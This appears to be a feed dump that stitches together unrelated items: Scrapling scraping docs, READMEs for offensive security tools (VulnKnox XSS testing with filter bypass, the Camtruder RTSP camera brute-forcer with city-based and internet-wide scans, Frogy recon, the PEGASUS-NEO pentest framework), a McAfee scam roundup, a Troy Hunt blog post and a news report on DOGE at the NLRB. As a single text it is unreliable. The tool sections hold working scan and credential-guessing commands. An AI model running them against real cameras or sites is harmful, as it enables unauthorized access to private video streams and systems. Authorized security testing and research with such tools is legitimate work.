You can search for a specific ancestor of an element that satisfies a function, all you need to do is to pass a function that takes an Adaptor
object as an argument and return True
if the condition satisfies or False
otherwise like below:
>>> quote.find_ancestor(lambda ancestor: ancestor.has_class('row'))
<data='<div class="row"> <div class="col-md-8">...' parent='<div class="container"> <div class="row...'>
You can select elements by their text content in multiple ways, here's a full example on another website:
>>> page = Fetcher().get('https://books.toscrape.com/index.html')
>>> page.find_by_text('Tipping the Velvet') # Find the first element whose text fully matches this text
<data='<a href="catalogue/tipping-the-velvet_99...' parent='<h3><a href="catalogue/tipping-the-velve...'>
>>> page.urljoin(page.find_by_text('Tipping the Velvet').attrib['href']) # We use `page.urljoin` to return the full URL from the relative `href`
'https://books.toscrape.com/catalogue/tipping-the-velvet_999/index.html'
>>> page.find_by_text('Tipping the Velvet', first_match=False) # Get all matches if there are more
[<data='<a href="catalogue/tipping-the-velvet_99...' parent='<h3><a href="catalogue/tipping-the-velve...'>]
>>> page.find_by_regex(r'£[\d\.]+') # Get the first element that its text content matches my price regex
<data='<p class="price_color">£51.77</p>' parent='<div class="product_price"> <p class="pr...'>
>>> page.find_by_regex(r'£[\d\.]+', first_match=False) # Get all elements that matches my price regex
[<data='<p class="price_color">£51.77</p>' parent='<div class="product_price"> <p class="pr...'>,
<data='<p class="price_color">£53.74</p>' parent='<div class="product_price"> <p class="pr...'>,
<data='<p class="price_color">£50.10</p>' parent='<div class="product_price"> <p class="pr...'>,
<data='<p class="price_color">£47.82</p>' parent='<div class="product_price"> <p class="pr...'>,
...]
Find all elements that are similar to the current element in location and attributes
# For this case, ignore the 'title' attribute while matching
>>> page.find_by_text('Tipping the Velvet').find_similar(ignore_attributes=['title'])
[<data='<a href="catalogue/a-light-in-the-attic_...' parent='<h3><a href="catalogue/a-light-in-the-at...'>,
<data='<a href="catalogue/soumission_998/index....' parent='<h3><a href="catalogue/soumission_998/in...'>,
<data='<a href="catalogue/sharp-objects_997/ind...' parent='<h3><a href="catalogue/sharp-objects_997...'>,
...]
# You will notice that the number of elements is 19 not 20 because the current element is not included.
>>> len(page.find_by_text('Tipping the Velvet').find_similar(ignore_attributes=['title']))
19
# Get the `href` attribute from all similar elements
>>> [element.attrib['href'] for element in page.find_by_text('Tipping the Velvet').find_similar(ignore_attributes=['title'])]
['catalogue/a-light-in-the-attic_1000/index.html',
'catalogue/soumission_998/index.html',
'catalogue/sharp-objects_997/index.html',
...]
To increase the complexity a little bit, let's say we want to get all books' data using that element as a starting point for some reason
>>> for product in page.find_by_text('Tipping the Velvet').parent.parent.find_similar():
print({
"name": product.css_first('h3 a::text'),
"price": product.css_first('.price_color').re_first(r'[\d\.]+'),
"stock": product.css('.availability::text')[-1].clean()
})
{'name': 'A Light in the ...', 'price': '51.77', 'stock': 'In stock'}
{'name': 'Soumission', 'price': '50.10', 'stock': 'In stock'}
{'name': 'Sharp Objects', 'price': '47.82', 'stock': 'In stock'}
...
The documentation will provide more advanced examples.
Let's say you are scraping a page with a structure like this:
<div class="container">
<section class="products">
<article class="product" id="p1">
<h3>Product 1</h3>
<p class="description">Description 1</p>
</article>
<article class="product" id="p2">
<h3>Product 2</h3>
<p class="description">Description 2</p>
</article>
</section>
</div>
And you want to scrape the first product, the one with the p1
ID. You will probably write a selector like this
page.css('#p1')
When website owners implement structural changes like
<div class="new-container">
<div class="product-wrapper">
<section class="products">
<article class="product new-class" data-id="p1">
<div class="product-info">
<h3>Product 1</h3>
<p class="new-description">Description 1</p>
</div>
</article>
<article class="product new-class" data-id="p2">
<div class="product-info">
<h3>Product 2</h3>
<p class="new-description">Description 2</p>
</div>
</article>
</section>
</div>
</div>
The selector will no longer function and your code needs maintenance. That's where Scrapling's auto-matching feature comes into play.
from scrapling.parser import Adaptor
# Before the change
page = Adaptor(page_source, url='example.com')
element = page.css('#p1' auto_save=True)
if not element: # One day website changes?
element = page.css('#p1', auto_match=True) # Scrapling still finds it!
# the rest of the code...
How does the auto-matching work? Check the FAQs section for that and other possible issues while auto-matching.
Let's use a real website as an example and use one of the fetchers to fetch its source. To do this we need to find a website that will change its design/structure soon, take a copy of its source then wait for the website to make the change. Of course, that's nearly impossible to know unless I know the website's owner but that will make it a staged test haha.
To solve this issue, I will use The Web Archive's Wayback Machine. Here is a copy of StackOverFlow's website in 2010, pretty old huh?Let's test if the automatch feature can extract the same button in the old design from 2010 and the current design using the same selector :)
If I want to extract the Questions button from the old design I can use a selector like this #hmenus > div:nth-child(1) > ul > li:nth-child(1) > a
This selector is too specific because it was generated by Google Chrome. Now let's test the same selector in both versions
>> from scrapling.fetchers import Fetcher
>> selector = '#hmenus > div:nth-child(1) > ul > li:nth-child(1) > a'
>> old_url = "https://web.archive.org/web/20100102003420/http://stackoverflow.com/"
>> new_url = "https://stackoverflow.com/"
>>
>> page = Fetcher(automatch_domain='stackoverflow.com').get(old_url, timeout=30)
>> element1 = page.css_first(selector, auto_save=True)
>>
>> # Same selector but used in the updated website
>> page = Fetcher(automatch_domain="stackoverflow.com").get(new_url)
>> element2 = page.css_first(selector, auto_match=True)
>>
>> if element1.text == element2.text:
... print('Scrapling found the same element in the old design and the new design!')
'Scrapling found the same element in the old design and the new design!'
Note that I used a new argument called automatch_domain
, this is because for Scrapling these are two different URLs, not the website so it isolates their data. To tell Scrapling they are the same website, we then pass the domain we want to use for saving auto-match data for them both so Scrapling doesn't isolate them.
In a real-world scenario, the code will be the same except it will use the same URL for both requests so you won't need to use the automatch_domain
argument. This is the closest example I can give to real-world cases so I hope it didn't confuse you :)
Notes: 1. For the two examples above I used one time the Adaptor
class and the second time the Fetcher
class just to show you that you can create the Adaptor
object by yourself if you have the source or fetch the source using any Fetcher
class then it will create the Adaptor
object for you. 2. Passing the auto_save
argument with the auto_match
argument set to False
while initializing the Adaptor/Fetcher object will only result in ignoring the auto_save
argument value and the following warning message text Argument `auto_save` will be ignored because `auto_match` wasn't enabled on initialization. Check docs for more info.
This behavior is purely for performance reasons so the database gets created/connected only when you are planning to use the auto-matching features. Same case with the auto_match
argument.
auto_match
parameter works only for Adaptor
instances not Adaptors
so if you do something like this you will get an error python page.css('body').css('#p1', auto_match=True)
because you can't auto-match a whole list, you have to be specific and do something like python page.css_first('body').css('#p1', auto_match=True)
Inspired by BeautifulSoup's find_all
function you can find elements by using find_all
/find
methods. Both methods can take multiple types of filters and return all elements in the pages that all these filters apply to.
So the way it works is after collecting all passed arguments and keywords, each filter passes its results to the following filter in a waterfall-like filtering system.
It filters all elements in the current page/element in the following order:
Note: The filtering process always starts from the first filter it finds in the filtering order above so if no tag name(s) are passed but attributes are passed, the process starts from that layer and so on. But the order in which you pass the arguments doesn't matter.
Examples to clear any confusion :)
>> from scrapling.fetchers import Fetcher
>> page = Fetcher().get('https://quotes.toscrape.com/')
# Find all elements with tag name `div`.
>> page.find_all('div')
[<data='<div class="container"> <div class="row...' parent='<body> <div class="container"> <div clas...'>,
<data='<div class="row header-box"> <div class=...' parent='<div class="container"> <div class="row...'>,
...]
# Find all div elements with a class that equals `quote`.
>> page.find_all('div', class_='quote')
[<data='<div class="quote" itemscope itemtype="h...' parent='<div class="col-md-8"> <div class="quote...'>,
<data='<div class="quote" itemscope itemtype="h...' parent='<div class="col-md-8"> <div class="quote...'>,
...]
# Same as above.
>> page.find_all('div', {'class': 'quote'})
[<data='<div class="quote" itemscope itemtype="h...' parent='<div class="col-md-8"> <div class="quote...'>,
<data='<div class="quote" itemscope itemtype="h...' parent='<div class="col-md-8"> <div class="quote...'>,
...]
# Find all elements with a class that equals `quote`.
>> page.find_all({'class': 'quote'})
[<data='<div class="quote" itemscope itemtype="h...' parent='<div class="col-md-8"> <div class="quote...'>,
<data='<div class="quote" itemscope itemtype="h...' parent='<div class="col-md-8"> <div class="quote...'>,
...]
# Find all div elements with a class that equals `quote`, and contains the element `.text` which contains the word 'world' in its content.
>> page.find_all('div', {'class': 'quote'}, lambda e: "world" in e.css_first('.text::text'))
[<data='<div class="quote" itemscope itemtype="h...' parent='<div class="col-md-8"> <div class="quote...'>]
# Find all elements that don't have children.
>> page.find_all(lambda element: len(element.children) > 0)
[<data='<html lang="en"><head><meta charset="UTF...'>,
<data='<head><meta charset="UTF-8"><title>Quote...' parent='<html lang="en"><head><meta charset="UTF...'>,
<data='<body> <div class="container"> <div clas...' parent='<html lang="en"><head><meta charset="UTF...'>,
...]
# Find all elements that contain the word 'world' in its content.
>> page.find_all(lambda element: "world" in element.text)
[<data='<span class="text" itemprop="text">"The...' parent='<div class="quote" itemscope itemtype="h...'>,
<data='<a class="tag" href="/tag/world/page/1/"...' parent='<div class="tags"> Tags: <meta class="ke...'>]
# Find all span elements that match the given regex
>> page.find_all('span', re.compile(r'world'))
[<data='<span class="text" itemprop="text">"The...' parent='<div class="quote" itemscope itemtype="h...'>]
# Find all div and span elements with class 'quote' (No span elements like that so only div returned)
>> page.find_all(['div', 'span'], {'class': 'quote'})
[<data='<div class="quote" itemscope itemtype="h...' parent='<div class="col-md-8"> <div class="quote...'>,
<data='<div class="quote" itemscope itemtype="h...' parent='<div class="col-md-8"> <div class="quote...'>,
...]
# Mix things up
>> page.find_all({'itemtype':"http://schema.org/CreativeWork"}, 'div').css('.author::text')
['Albert Einstein',
'J.K. Rowling',
...]
Here's what else you can do with Scrapling:
lxml.etree
object itself of any element directly python >>> quote._root <Element div at 0x107f98870>
Saving and retrieving elements manually to auto-match them outside the css
and the xpath
methods but you have to set the identifier by yourself.
To save an element to the database: python >>> element = page.find_by_text('Tipping the Velvet', first_match=True) >>> page.save(element, 'my_special_element')
python >>> element_dict = page.retrieve('my_special_element') >>> page.relocate(element_dict, adaptor_type=True) [<data='<a href="catalogue/tipping-the-velvet_99...' parent='<h3><a href="catalogue/tipping-the-velve...'>] >>> page.relocate(element_dict, adaptor_type=True).css('::text') ['Tipping the Velvet']
if you want to keep it as lxml.etree
object, leave the adaptor_type
argument python >>> page.relocate(element_dict) [<Element a at 0x105a2a7b0>]
Filtering results based on a function
# Find all products over $50
expensive_products = page.css('.product_pod').filter(
lambda p: float(p.css('.price_color').re_first(r'[\d\.]+')) > 50
)
# Find all the products with price '53.23'
page.css('.product_pod').search(
lambda p: float(p.css('.price_color').re_first(r'[\d\.]+')) == 54.23
)
Doing operations on element content is the same as scrapy python quote.re(r'regex_pattern') # Get all strings (TextHandlers) that match the regex pattern quote.re_first(r'regex_pattern') # Get the first string (TextHandler) only quote.json() # If the content text is jsonable, then convert it to json using `orjson` which is 10x faster than the standard json library and provides more options
except that you can do more with them like python quote.re( r'regex_pattern', replace_entities=True, # Character entity references are replaced by their corresponding character clean_match=True, # This will ignore all whitespaces and consecutive spaces while matching case_sensitive= False, # Set the regex to ignore letters case while compiling it )
Hence all of these methods are methods from the TextHandler
within that contains the text content so the same can be done directly if you call the .text
property or equivalent selector function.
Doing operations on the text content itself includes
python quote.clean()
TextHandler
objects too? so in cases where you have for example a JS object assigned to a JS variable inside JS code and want to extract it with regex and then convert it to json object, in other libraries, these would be more than 1 line of code but here you can do it in 1 line like this python page.xpath('//script/text()').re_first(r'var dataLayer = (.+);').json()
Sort all characters in the string as if it were a list and return the new string python quote.sort(reverse=False)
To be clear,
TextHandler
is a sub-class of Python'sstr
so all normal operations/methods that work with Python strings will work with it.
Any element's attributes are not exactly a dictionary but a sub-class of mapping called AttributesHandler
that's read-only so it's faster and string values returned are actually TextHandler
objects so all operations above can be done on them, standard dictionary operations that don't modify the data, and more :)
python >>> for item in element.attrib.search_values('catalogue', partial=True): print(item) {'href': 'catalogue/tipping-the-velvet_999/index.html'}
python >>> element.attrib.json_string b'{"href":"catalogue/tipping-the-velvet_999/index.html","title":"Tipping the Velvet"}'
python >>> dict(element.attrib) {'href': 'catalogue/tipping-the-velvet_999/index.html', 'title': 'Tipping the Velvet'}
Scrapling is under active development so expect many more features coming soon :)
There are a lot of deep details skipped here to make this as short as possible so to take a deep dive, head to the docs section. I will try to keep it updated as possible and add complex examples. There I will explain points like how to write your storage system, write spiders that don't depend on selectors at all, and more...
Note that implementing your storage system can be complex as there are some strict rules such as inheriting from the same abstract class, following the singleton design pattern used in other classes, and more. So make sure to read the docs first.
[!IMPORTANT] A website is needed to provide detailed library documentation.
I'm trying to rush creating the website, researching new ideas, and adding more features/tests/benchmarks but time is tight with too many spinning plates between work, personal life, and working on Scrapling. I have been working on Scrapling for months for free after all.
If you likeScrapling
and want it to keep improving then this is a friendly reminder that you can help by supporting me through the sponsor button.
This section addresses common questions about Scrapling, please read this section before opening an issue.
css
or xpath
with the auto_save
parameter set to True
before structural changes happen.Now because everything about the element can be changed or removed, nothing from the element can be used as a unique identifier for the database. To solve this issue, I made the storage system rely on two things:
identifier
parameter you passed to the method while selecting. If you didn't pass one, then the selector string itself will be used as an identifier but remember you will have to use it as an identifier value later when the structure changes and you want to pass the new selector.Together both are used to retrieve the element's unique properties from the database later. 4. Now later when you enable the auto_match
parameter for both the Adaptor instance and the method call. The element properties are retrieved and Scrapling loops over all elements in the page and compares each one's unique properties to the unique properties we already have for this element and a score is calculated for each one. 5. Comparing elements is not exact but more about finding how similar these values are, so everything is taken into consideration, even the values' order, like the order in which the element class names were written before and the order in which the same element class names are written now. 6. The score for each element is stored in the table, and the element(s) with the highest combined similarity scores are returned.
Not a big problem as it depends on your usage. The word default
will be used in place of the URL field while saving the element's unique properties. So this will only be an issue if you used the same identifier later for a different website that you didn't pass the URL parameter while initializing it as well. The save process will overwrite the previous data and auto-matching uses the latest saved properties only.
For each element, Scrapling will extract: - Element tag name, text, attributes (names and values), siblings (tag names only), and path (tag names only). - Element's parent tag name, attributes (names and values), and text.
auto_save
/auto_match
parameter while selecting and it got completely ignored with a warning messageThat's because passing the auto_save
/auto_match
argument without setting auto_match
to True
while initializing the Adaptor object will only result in ignoring the auto_save
/auto_match
argument value. This behavior is purely for performance reasons so the database gets created only when you are planning to use the auto-matching features.
It could be one of these reasons: 1. No data were saved/stored for this element before. 2. The selector passed is not the one used while storing element data. The solution is simple - Pass the old selector again as an identifier to the method called. - Retrieve the element with the retrieve method using the old selector as identifier then save it again with the save method and the new selector as identifier. - Start using the identifier argument more often if you are planning to use every new selector from now on. 3. The website had some extreme structural changes like a new full design. If this happens a lot with this website, the solution would be to make your code as selector-free as possible using Scrapling features.
Pretty much yeah, almost all features you get from BeautifulSoup can be found or achieved in Scrapling one way or another. In fact, if you see there's a feature in bs4 that is missing in Scrapling, please make a feature request from the issues tab to let me know.
Of course, you can find elements by text/regex, find similar elements in a more reliable way than AutoScraper, and finally save/retrieve elements manually to use later as the model feature in AutoScraper. I have pulled all top articles about AutoScraper from Google and tested Scrapling against examples in them. In all examples, Scrapling got the same results as AutoScraper in much less time.
Yes, Scrapling instances are thread-safe. Each Adaptor instance maintains its state.
Everybody is invited and welcome to contribute to Scrapling. There is a lot to do!
Please read the contributing file before doing anything.
[!CAUTION] This library is provided for educational and research purposes only. By using this library, you agree to comply with local and international laws regarding data scraping and privacy. The authors and contributors are not responsible for any misuse of this software. This library should not be used to violate the rights of others, for unethical purposes, or to use data in an unauthorized or illegal manner. Do not use it on any website unless you have permission from the website owner or within their allowed rules like the
robots.txt
file, for example.
This work is licensed under BSD-3
This project includes code adapted from: - Parsel (BSD License) - Used for translator submodule
VulnKnox is a powerful command-line tool written in Go that interfaces with the KNOXSS API. It automates the process of testing URLs for Cross-Site Scripting (XSS) vulnerabilities using the advanced capabilities of the KNOXSS engine.
go install github.com/iqzer0/vulnknox@latest
Before using the tool, you need to set up your configuration:
API Key
Obtain your KNOXSS API key from knoxss.me.
On the first run, a default configuration file will be created at:
Linux/macOS: ~/.config/vulnknox/config.json
Windows: %APPDATA%\VulnKnox\config.json
Edit the config.json file and replace YOUR_API_KEY_HERE
with your actual API key.
Discord Webhook (Optional)
If you want to receive notifications on Discord, add your webhook URL to the config.json file or use the -dw flag.
Usage of vulnknox:
-u Input URL to send to KNOXSS API
-i Input file containing URLs to send to KNOXSS API
-X GET HTTP method to use: GET, POST, or BOTH
-pd POST data in format 'param1=value¶m2=value'
-headers Custom headers in format 'Header1:value1,Header2:value2'
-afb Use Advanced Filter Bypass
-checkpoc Enable CheckPoC feature
-flash Enable Flash Mode
-o The file to save the results to
-ow Overwrite output file if it exists
-oa Output all results to file, not just successful ones
-s Only show successful XSS payloads in output
-p 3 Number of parallel processes (1-5)
-t 600 Timeout for API requests in seconds
-dw Discord Webhook URL (overrides config file)
-r 3 Number of retries for failed requests
-ri 30 Interval between retries in seconds
-sb 0 Skip domains after this many 403 responses
-proxy Proxy URL (e.g., http://127.0.0.1:8080)
-v Verbose output
-version Show version number
-no-banner Suppress the banner
-api-key KNOXSS API Key (overrides config file)
Test a single URL using GET method:
vulnknox -u "https://example.com/page?param=value"
Test a URL with POST data:
vulnknox -u "https://example.com/submit" -X POST -pd "param1=value1¶m2=value2"
Enable Advanced Filter Bypass and Flash Mode:
vulnknox -u "https://example.com/page?param=value" -afb -flash
Use custom headers (e.g., for authentication):
vulnknox -u "https://example.com/secure" -headers "Cookie:sessionid=abc123"
Process URLs from a file with 5 concurrent processes:
vulnknox -i urls.txt -p 5
Send notifications to Discord on successful XSS findings:
vulnknox -u "https://example.com/page?param=value" -dw "https://discord.com/api/webhooks/your/webhook/url"
Test both GET and POST methods with CheckPoC enabled:
vulnknox -u "https://example.com/page" -X BOTH -checkpoc
Use a proxy and increase the number of retries:
vulnknox -u "https://example.com/page?param=value" -proxy "http://127.0.0.1:8080" -r 5
Suppress the banner and only show successful XSS payloads:
vulnknox -u "https://example.com/page?param=value" -no-banner -s
[ XSS! ]: Indicates a successful XSS payload was found.
[ SAFE ]: No XSS vulnerability was found in the target.
[ ERR! ]: An error occurred during the request.
[ SKIP ]: The domain or URL was skipped due to multiple failed attempts (e.g., after receiving too many 403 Forbidden responses as specified by the -sb option).
[BALANCE]: Indicates your current API usage with KNOXSS, showing how many API calls you've used out of your total allowance.
The tool also provides a summary at the end of execution, including the number of requests made, successful XSS findings, safe responses, errors, and any skipped domains.
Contributions are welcome! If you have suggestions for improvements or encounter any issues, please open an issue or submit a pull request.
This project is licensed under the MIT License.
Camtruder is a high-performance RTSP camera discovery and vulnerability assessment tool written in Go. It efficiently scans and identifies vulnerable RTSP cameras across networks using various authentication methods and path combinations, with support for both targeted and internet-wide scanning capabilities.
Raw CIDR output for integration with other tools
Screenshot Capability
Configurable output directory
Location-Based Search
Raw output mode for scripting
Comprehensive Authentication Testing
Credential validation system
Smart Path Discovery
Automatic path validation
High Performance Architecture
Parallel connection handling
Advanced Output & Analysis
go install github.com/ALW1EZ/camtruder@v3.7.0
git clone https://github.com/ALW1EZ/camtruder.git
cd camtruder
go build
# Scan a single IP
./camtruder -t 192.168.1.100
# Scan a network range
./camtruder -t 192.168.1.0/24
# Search by location with detailed output
./camtruder -t london -s
> [ NET-ISP ] [ 192.168.1.0/24 ] [256]
# Get raw CIDR ranges for location
./camtruder -t london -ss
> 192.168.1.0/24
# Scan multiple IPs from file
./camtruder -t targets.txt
# Take screenshots of discovered cameras
./camtruder -t 192.168.1.0/24 -m screenshots
# Pipe from port scanners
naabu -host 192.168.1.0/24 -p 554 | camtruder
masscan 192.168.1.0/24 -p554 --rate 1000 | awk '{print $6}' | camtruder
zmap -p554 192.168.0.0/16 | camtruder
# Internet scan (scan till 100 hits)
./camtruder -t 100
# Custom credentials with increased threads
./camtruder -t 192.168.1.0/24 -u admin,root -p pass123,admin123 -w 50
# Location search with raw output piped to zmap
./camtruder -t berlin -ss | while read range; do zmap -p 554 $range; done
# Save results to file (as full url, you can use mpv --playlist=results.txt to watch the streams)
./camtruder -t istanbul -o results.txt
# Internet scan with limit of 50 workers and verbose output
./camtruder -t 100 -w 50 -v
Option | Description | Default |
---|---|---|
-t | Target IP, CIDR range, location, or file | Required |
-u | Custom username(s) | Built-in list |
-p | Custom password(s) | Built-in list |
-w | Number of threads | 20 |
-to | Connection timeout (seconds) | 5 |
-o | Output file path | None |
-v | Verbose output | False |
-s | Search only - shows ranges with netnames | False |
-ss | Raw IP range output - only CIDR ranges | False |
-po | RTSP port | 554 |
-m | Directory to save screenshots (requires ffmpeg) | None |
[ TR-NET-ISP ] [ 193.3.52.0/24 ] [256]
[ EXAMPLE-ISP ] [ 212.175.100.136/29 ] [8]
193.3.52.0/24
212.175.100.136/29
╭─ Found vulnerable camera [Hikvision, H264, 30fps]
├ Host : 192.168.1.100:554
├ Geo : United States/California/Berkeley
├ Auth : admin:12345
├ Path : /Streaming/Channels/1
╰ URL : rtsp://admin:12345@192.168.1.100:554/Streaming/Channels/1
This tool is intended for security research and authorized testing only. Users are responsible for ensuring they have permission to scan target systems and comply with all applicable laws and regulations.
This project is licensed under the MIT License - see the LICENSE file for details.
Made by @ALW1EZ
Welcome to the first edition of This Week in Scams, a new weekly series from McAfee breaking down the latest fraud trends, headlines, and real-time threats we’re detecting across the digital landscape.
This week, we’re spotlighting the FBI’s shocking new cybercrime report, the rise of AI-generated deepfakes, and a sophisticated Gmail impersonation scam flagged by Google. We’re also seeing a surge in location-specific toll scams and fake delivery alerts—a reminder that staying ahead of scammers starts with knowing how they operate.
Let’s dive in.
$16.6 Billion Lost to Online Scams in 2024
The FBI’s latest Internet Crime Report is here—and the numbers are staggering. Americans lost $16.6 billion to online scams last year, up from $12.5 billion in 2023. Older adults and crypto investors were hit especially hard, but the agency warns the real total is likely much higher, since many victims never report the crime.
Read more
AI-Powered Deepfake Scams Get More Convincing
Deepfake-enabled fraud has already caused more than $200 million in financial losses in just the first quarter of 2025.
McAfee researchers estimate the average American sees three deepfakes per day, many of which are designed to mimic real people, services, or news stories. Whether it’s fake crypto pitches, job offers, or social media stunts—seeing is no longer believing.
Read more
Google Warns Users of Sophisticated Email Scam
Google is alerting Gmail users to a new type of phishing email that looks like it comes from Google itself. These messages often appear in legitimate email threads and pass all typical security checks, but lead victims to a cloned Google login page designed to steal credentials. The scam highlights how attackers are evolving to outsmart traditional filters.
Read more
McAfee Researchers have observed a recent surge in the following scam types:
Fake Delivery Notifications: Scammers impersonate delivery services like USPS, UPS, and FedEx, sending fake tracking links that install malware or steal payment info
Invoice Scams: Fraudulent messages that claim you owe money for a product or service, often accompanied by a fake invoice PDF or request for payment via phone
Cloud Storage Spoofs: Emails that pretend to be from Google Drive, Dropbox, or OneDrive, prompting you to “log in” to view shared files. The links lead to phishing sites designed to capture your credentials.
Toll Text Scams: Personalized smishing messages that claim you owe a toll and link to fake payment sites. These messages often use location data—like your area code or recent city visits—to appear legitimate. McAfee Labs saw toll scam texts spike nearly 4x between January and February.
This week, Steve Grobman, executive vice president and chief technology officer at McAfee, said the toll scam is effective because it hits all the correct social points for a consumer.
These scams often rely on urgency and familiarity—pretending to be something you trust or expect—to get you to act quickly without double-checking.
Thanks for reading—See you next week with more scam alerts, insights, and protection tips from the McAfee team.
The post This Week in Scams: $16.6 Billion Lost, Deepfakes Rise, and Google Email Scams Emerge appeared first on McAfee Blog.
Frogy 2.0 is an automated external reconnaissance and Attack Surface Management (ASM) toolkit designed to map out an organization's entire internet presence. It identifies assets, IP addresses, web applications, and other metadata across the public internet and then smartly prioritizes them with highest (most attractive) to lowest (least attractive) from an attacker's playground perspective.
Comprehensive recon:
Aggregate subdomains and assets using multiple tools (CHAOS, Subfinder, Assetfinder, crt.sh) to map an organization's entire digital footprint.
Live asset verification:
Validate assets with live DNS resolution and port scanning (using DNSX and Naabu) to confirm what is publicly reachable.
In-depth web recon:
Collect detailed HTTP response data (via HTTPX) including metadata, technology stack, status codes, content lengths, and more.
Smart prioritization:
Use a composite scoring system that considers homepage status, login identification, technology stack, and DNS data and much more to generate risk score for each assets helping bug bounty hunters and pentesters focus on the most promising targets to start attacks with.
Professional reporting:
Generate a dynamic, colour-coded HTML report with a modern design and dark/light theme toggle.
In this tool, risk scoring is based on the notion of asset attractiveness—the idea that certain attributes or characteristics make an asset more interesting to attackers. If we see more of these attributes, the overall score goes up, indicating a broader "attack surface" that adversaries could leverage. Below is an overview of how each factor contributes to the final risk score.
200 OK
, it often means the page is legitimately reachable and responding with content. A 200 OK
is more interesting to attackers than a 404
or a redirect—so a 200 status modestly increases the risk.Strict-Transport-Security (HSTS)
X-Frame-Options
Content-Security-Policy
X-XSS-Protection
Referrer-Policy
Permissions-Policy
Missing or disabled headers mean an endpoint is more prone to common web exploits. Each absent header increments the score.
Each factor above contributes one or more points to the final risk score. For example:
Once all factors are tallied, we get a numeric risk score. Higher means more interesting and potentially gives more room for pentesters to test around to an attacker.
Why This Matters
This approach helps you quickly prioritize which assets warrant deeper testing. Subdomains with high counts of open ports, advanced internal usage, missing headers, or login panels are more complex, more privileged, or more likely to be misconfigured—therefore, your security team can focus on those first.
Clone the repository and run the installer script to set up all dependencies and tools:
chmod +x install.sh
./install.sh
chmod +x frogy.sh
./frogy.sh domains.txt
https://www.youtube.com/watch?v=LHlU4CYNj1M
____ _ _
| _ \ ___ __ _ __ _ ___ _ _ ___| \ | |
| |_) / _ \/ _` |/ _` / __| | | / __| \| |
| __/ __/ (_| | (_| \__ \ |_| \__ \ |\ |
|_| \___|\__, |\__,_|___/\__,_|___/_| \_|
|___/
███▄ █ ▓█████ ▒█████
██ ▀█ █ ▓█ ▀ ▒██▒ ██▒
▓██ ▀█ ██▒▒███ ▒██░ ██▒
▓██▒ ▐▌██▒▒▓█ ▄ ▒██ ██░
▒██░ ▓██░░▒████▒░ ████▓▒░
░ ▒░ ▒ ▒ ░░ ▒░ ░░ ▒░▒░▒░
░ ░░ ░ ▒░ ░ ░ ░ ░ ▒ ▒░
░ ░ ░ ░ ░ ░ ░ ▒
░ ░ ░ ░ ░
PEGASUS-NEO is a comprehensive penetration testing framework designed for security professionals and ethical hackers. It combines multiple security tools and custom modules for reconnaissance, exploitation, wireless attacks, web hacking, and more.
This tool is provided for educational and ethical testing purposes only. Usage of PEGASUS-NEO for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state, and federal laws.
Developers assume no liability and are not responsible for any misuse or damage caused by this program.
PEGASUS-NEO - Advanced Penetration Testing Framework
Copyright (C) 2024 Letda Kes dr. Sobri. All rights reserved.
This software is proprietary and confidential. Unauthorized copying, transfer, or
reproduction of this software, via any medium is strictly prohibited.
Written by Letda Kes dr. Sobri <muhammadsobrimaulana31@gmail.com>, January 2024
Password: Sobri
Social media tracking
Exploitation & Pentesting
Custom payload generation
Wireless Attacks
WPS exploitation
Web Attacks
CMS scanning
Social Engineering
Credential harvesting
Tracking & Analysis
# Clone the repository
git clone https://github.com/sobri3195/pegasus-neo.git
# Change directory
cd pegasus-neo
# Install dependencies
sudo python3 -m pip install -r requirements.txt
# Run the tool
sudo python3 pegasus_neo.py
sudo python3 pegasus_neo.py
This is a proprietary project and contributions are not accepted at this time.
For support, please email muhammadsobrimaulana31@gmail.com atau https://lynk.id/muhsobrimaulana
This project is protected under proprietary license. See the LICENSE file for details.
Made with ❤️ by Letda Kes dr. Sobri
How do seemingly little things manage to consume so much time?! We had a suggestion this week that instead of being able to login to the new HIBP website, you should instead be able to log in. This initially confused me because I've been used to logging on to things for decades:
So, I went and signed in (yep, different again) to X and asked the masses what the correct term was:
When accessing your @haveibeenpwned dashboard, which of the following should you do? Preview screen for reference: https://t.co/9gqfr8hZrY
— Troy Hunt (@troyhunt) April 23, 2025
Which didn't result in a conclusive victor, so, I started browsing around.
Cloudflare's Zero Trust docs contain information about customising the login page, which I assume you can do once you log in:
Another, uh, "popular" site prompts you to log in:
After which you're invited to sign in:
You can log in to Canva, which is clearly indicated by the HTML title, which suggests you're on the login page:
You can log on to the Commonwealth Bank down here in Australia:
But the login page for ANZ bank requires to log in, unless you've forgotten your login details:
Ah, but many of these are just the difference between the noun "login" (the page is a thing) and the verb "log in" (when you perform an action), right? Well... depends who you bank with 🤷♂️
And maybe you don't log in or login at all:
Finally, from the darkness of seemingly interchangeable terms that may or may not violate principles of English language, emerged a pattern. You also sign in to Google:
And Microsoft:
And Amazon:
And Yahoo:
And, as I mentioned earlier, X:
And now, Have I Been Pwned:
There are some notable exceptions (Facebook and ChatGPT, for example), but "sign in" did emerge as the frontrunner among the world's most popular sites. If I really start to overthink it, I do feel that "log[whatever]" implies something different to why we authenticate to systems today and is more a remnant of a bygone era. But frankly, that argument is probably no more valid than whether you're doing a verb thing or a noun thing.
A whistleblower at the National Labor Relations Board (NLRB) alleged last week that denizens of Elon Musk’s Department of Government Efficiency (DOGE) siphoned gigabytes of data from the agency’s sensitive case files in early March. The whistleblower said accounts created for DOGE at the NLRB downloaded three code repositories from GitHub. Further investigation into one of those code bundles shows it is remarkably similar to a program published in January 2025 by Marko Elez, a 25-year-old DOGE employee who has worked at a number of Musk’s companies.
According to a whistleblower complaint filed last week by Daniel J. Berulis, a 38-year-old security architect at the NLRB, officials from DOGE met with NLRB leaders on March 3 and demanded the creation of several all-powerful “tenant admin” accounts that were to be exempted from network logging activity that would otherwise keep a detailed record of all actions taken by those accounts.
Berulis said the new DOGE accounts had unrestricted permission to read, copy, and alter information contained in NLRB databases. The new accounts also could restrict log visibility, delay retention, route logs elsewhere, or even remove them entirely — top-tier user privileges that neither Berulis nor his boss possessed.
Berulis said he discovered one of the DOGE accounts had downloaded three external code libraries from GitHub that neither NLRB nor its contractors ever used. A “readme” file in one of the code bundles explained it was created to rotate connections through a large pool of cloud Internet addresses that serve “as a proxy to generate pseudo-infinite IPs for web scraping and brute forcing.” Brute force attacks involve automated login attempts that try many credential combinations in rapid sequence.
A search on that description in Google brings up a code repository at GitHub for a user with the account name “Ge0rg3” who published a program roughly four years ago called “requests-ip-rotator,” described as a library that will allow the user “to bypass IP-based rate-limits for sites and services.”
